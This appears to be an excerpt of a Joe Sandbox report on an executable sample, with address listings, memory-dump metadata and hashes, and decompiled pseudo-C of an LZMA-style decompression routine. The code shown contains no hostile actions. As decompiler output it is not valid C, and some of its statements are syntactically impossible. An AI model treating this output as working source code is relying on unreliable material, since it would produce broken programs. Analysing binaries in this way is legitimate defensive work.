                                                          0x00406b31
                                                          0x00406b31
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b6c
                                                          0x00406b6c
                                                          0x00406b70
                                                          0x00407178
                                                          0x00000000
                                                          0x00407178
                                                          0x00406b76
                                                          0x00406b79
                                                          0x00406b7c
                                                          0x00406b80
                                                          0x00406b83
                                                          0x00406b89
                                                          0x00406b8b
                                                          0x00406b8b
                                                          0x00406b8b
                                                          0x00406b8e
                                                          0x00406b91
                                                          0x00406b91
                                                          0x00406b97
                                                          0x00406b35
                                                          0x00406b35
                                                          0x00406b38
                                                          0x00000000
                                                          0x00406b38
                                                          0x00406b99
                                                          0x00406b99
                                                          0x00406b9c
                                                          0x00406b9f
                                                          0x00406ba2
                                                          0x00406ba5
                                                          0x00406ba8
                                                          0x00406bab
                                                          0x00406bae
                                                          0x00406bb1
                                                          0x00406bb4
                                                          0x00406bb7
                                                          0x00406bcf
                                                          0x00406bd2
                                                          0x00406bd5
                                                          0x00406bd8
                                                          0x00406bd8
                                                          0x00406bdb
                                                          0x00406bdf
                                                          0x00406be1
                                                          0x00406bb9
                                                          0x00406bb9
                                                          0x00406bc1
                                                          0x00406bc6
                                                          0x00406bc8
                                                          0x00406bca
                                                          0x00406bca
                                                          0x00406be4
                                                          0x00406beb
                                                          0x00406bee
                                                          0x00000000
                                                          0x00406bf0
                                                          0x00000000
                                                          0x00406bf0
                                                          0x00000000
                                                          0x00406e7d
                                                          0x00406e7d
                                                          0x00406e81
                                                          0x004071a8
                                                          0x00000000
                                                          0x004071a8
                                                          0x00406e87
                                                          0x00406e8a
                                                          0x00406e8d
                                                          0x00406e91
                                                          0x00406e94
                                                          0x00406e9a
                                                          0x00406e9c
                                                          0x00406e9c
                                                          0x00406e9c
                                                          0x00406e9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c4d
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407049
                                                          0x0040704d
                                                          0x0040706b
                                                          0x0040706b
                                                          0x0040706b
                                                          0x00407072
                                                          0x00407079
                                                          0x00000000
                                                          0x00407079
                                                          0x0040704f
                                                          0x00407052
                                                          0x00407055
                                                          0x00407058
                                                          0x0040705f
                                                          0x00000000
                                                          0x00000000
                                                          0x0040713a
                                                          0x0040713d
                                                          0x0040703e
                                                          0x0040703e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d74
                                                          0x00406d76
                                                          0x00406d7d
                                                          0x00406d7e
                                                          0x00406d80
                                                          0x00406d83
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d8b
                                                          0x00406d8e
                                                          0x00406d91
                                                          0x00406d93
                                                          0x00406d95
                                                          0x00406d95
                                                          0x00406d96
                                                          0x00406d99
                                                          0x00406da0
                                                          0x00406da3
                                                          0x00406db1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407096
                                                          0x00407096
                                                          0x0040709a
                                                          0x004071d2
                                                          0x00000000
                                                          0x004071d2
                                                          0x004070a0
                                                          0x004070a3
                                                          0x004070a6
                                                          0x004070aa
                                                          0x004070ad
                                                          0x004070b3
                                                          0x004070b5
                                                          0x004070b5
                                                          0x004070b5
                                                          0x004070b8
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070bb
                                                          0x00000000
                                                          0x00000000
                                                          0x00406db9
                                                          0x00406dbc
                                                          0x00406df2
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f28
                                                          0x00406f2a
                                                          0x004071b4
                                                          0x00000000
                                                          0x004071b4
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f39
                                                          0x00406f3d
                                                          0x00406f40
                                                          0x00406f40
                                                          0x00406f40
                                                          0x00000000
                                                          0x00406f40
                                                          0x00406dbe
                                                          0x00406dc0
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc7
                                                          0x00406dc8
                                                          0x00406dca
                                                          0x00406dcc
                                                          0x00406dcf
                                                          0x00406dd2
                                                          0x00406de8
                                                          0x00406ded
                                                          0x00406e25
                                                          0x00406e25
                                                          0x00406e29
                                                          0x00406e55
                                                          0x00406e57
                                                          0x00406e5e
                                                          0x00406e61
                                                          0x00406e64
                                                          0x00406e64
                                                          0x00406e69
                                                          0x00406e69
                                                          0x00406e6b
                                                          0x00406e6e
                                                          0x00406e75
                                                          0x00406e78
                                                          0x00406ea5
                                                          0x00406ea5
                                                          0x00406ea8
                                                          0x00406eab
                                                          0x00406f1f
                                                          0x00406f1f
                                                          0x00406f1f
                                                          0x00000000
                                                          0x00406f1f
                                                          0x00406ead
                                                          0x00406eb3
                                                          0x00406eb6
                                                          0x00406eb9
                                                          0x00406ebc
                                                          0x00406ebf
                                                          0x00406ec2
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ecb
                                                          0x00406ece
                                                          0x00406ee7
                                                          0x00406ee9
                                                          0x00406eec
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef2
                                                          0x00406ef5
                                                          0x00406ef7
                                                          0x00406ef9
                                                          0x00406efc
                                                          0x00406efe
                                                          0x00406f01
                                                          0x00406f05
                                                          0x00406f07
                                                          0x00406f07
                                                          0x00406f08
                                                          0x00406f0b
                                                          0x00406f0e
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed8
                                                          0x00406edd
                                                          0x00406edf
                                                          0x00406ee2
                                                          0x00406ee2
                                                          0x00406f11
                                                          0x00406f18
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00000000
                                                          0x00406f1a
                                                          0x00000000
                                                          0x00406f1a
                                                          0x00406f18
                                                          0x00406e2b
                                                          0x00406e2e
                                                          0x00406e30
                                                          0x00406e33
                                                          0x00406e36
                                                          0x00406e39
                                                          0x00406e3b
                                                          0x00406e3e
                                                          0x00406e41
                                                          0x00406e41
                                                          0x00406e44
                                                          0x00406e44
                                                          0x00406e47
                                                          0x00406e4e
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00000000
                                                          0x00406e50
                                                          0x00000000
                                                          0x00406e50
                                                          0x00406e4e
                                                          0x00406dd4
                                                          0x00406dd7
                                                          0x00406dd9
                                                          0x00406ddc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b3b
                                                          0x00406b3b
                                                          0x00406b3f
                                                          0x00407184
                                                          0x00000000
                                                          0x00407184
                                                          0x00406b45
                                                          0x00406b48
                                                          0x00406b4b
                                                          0x00406b4e
                                                          0x00406b51
                                                          0x00406b54
                                                          0x00406b57
                                                          0x00406b59
                                                          0x00406b5c
                                                          0x00406b5f
                                                          0x00406b62
                                                          0x00406b64
                                                          0x00406b64
                                                          0x00406b64
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cc6
                                                          0x00406cc6
                                                          0x00406cca
                                                          0x00407190
                                                          0x00000000
                                                          0x00407190
                                                          0x00406cd0
                                                          0x00406cd3
                                                          0x00406cd6
                                                          0x00406cd9
                                                          0x00406cdb
                                                          0x00406cdb
                                                          0x00406cdb
                                                          0x00406cde
                                                          0x00406ce1
                                                          0x00406ce4
                                                          0x00406ce7
                                                          0x00406cea
                                                          0x00406ced
                                                          0x00406cee
                                                          0x00406cf0
                                                          0x00406cf0
                                                          0x00406cf0
                                                          0x00406cf3
                                                          0x00406cf6
                                                          0x00406cf9
                                                          0x00406cfc
                                                          0x00406cfc
                                                          0x00406cfc
                                                          0x00406cff
                                                          0x00406d01
                                                          0x00406d01
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f43
                                                          0x00406f43
                                                          0x00406f43
                                                          0x00406f47
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f4d
                                                          0x00406f50
                                                          0x00406f53
                                                          0x00406f56
                                                          0x00406f58
                                                          0x00406f58
                                                          0x00406f58
                                                          0x00406f5b
                                                          0x00406f5e
                                                          0x00406f61
                                                          0x00406f64
                                                          0x00406f67
                                                          0x00406f6a
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f70
                                                          0x00406f73
                                                          0x00406f76
                                                          0x00406f79
                                                          0x00406f7c
                                                          0x00406f80
                                                          0x00406f82
                                                          0x00406f85
                                                          0x00000000
                                                          0x00406f87
                                                          0x00406d04
                                                          0x00406d04
                                                          0x00000000
                                                          0x00406d04
                                                          0x00406f85
                                                          0x004071ba
                                                          0x004071dc
                                                          0x004071e2
                                                          0x004071e4
                                                          0x004071eb
                                                          0x004071ed
                                                          0x004071f4
                                                          0x004071f8
                                                          0x00000000
                                                          0x004067e9
                                                          0x004071f1
                                                          0x004071f1
                                                          0x00000000
                                                          0x004071f1
                                                          0x0040703e
                                                          0x004070c4
                                                          0x004070ca
                                                          0x004070cd
                                                          0x004070d0
                                                          0x004070d3
                                                          0x004070d6
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070df
                                                          0x004070e5
                                                          0x004070fe
                                                          0x00407101
                                                          0x00407104
                                                          0x00407107
                                                          0x0040710b
                                                          0x0040710d
                                                          0x0040710e
                                                          0x00407111
                                                          0x004070e7
                                                          0x004070e7
                                                          0x004070ef
                                                          0x004070f4
                                                          0x004070f6
                                                          0x004070f9
                                                          0x004070f9
                                                          0x0040711b
                                                          0x00000000
                                                          0x0040711d
                                                          0x00000000
                                                          0x0040711d
                                                          0x0040711b
                                                          0x00000000
                                                          0x00406f90

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                          • Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
                                                          • Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                          • Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00406CA2 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 98%
                                                          			E00406CA2() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004071F9))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4)); // executed
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
